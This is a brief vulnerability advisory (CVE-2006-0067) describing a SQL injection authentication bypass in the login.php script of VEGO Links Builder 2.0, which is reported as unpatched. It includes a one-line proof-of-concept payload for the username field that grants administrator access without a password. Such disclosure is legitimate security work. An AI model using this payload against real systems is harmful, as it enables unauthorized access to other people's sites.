Authentication Bypass in VEGO Links Builder
Summary
- Vulnerability
- Authentication Bypass in VEGO Links Builder
- Discovered
- 2005.12.29
- Last Update
- 0 n/a
- ID
- EV0002
- CVE
- CVE-2006-0067
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched
- Vendor
- VEGO (http://alas.matf.bg.ac.yu/~mr99067)
- Vulnerable Software
- VEGO Links Builder
- Version
- 2.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in VEGO Links Builder script.
Vulnerable script: login.php
Variable $username isn't properly sanitized before being used in a SQL query. This can be used to enter administrator area without password.
Condition: magic_quotes_gpc = off
PoC/Exploit
Link:
http://host/links/login.php
username: a' or 1/*
password: any
Solution.
Solution for "Authentication Bypass in VEGO Links Builder" is not available. Check VEGO website for updates.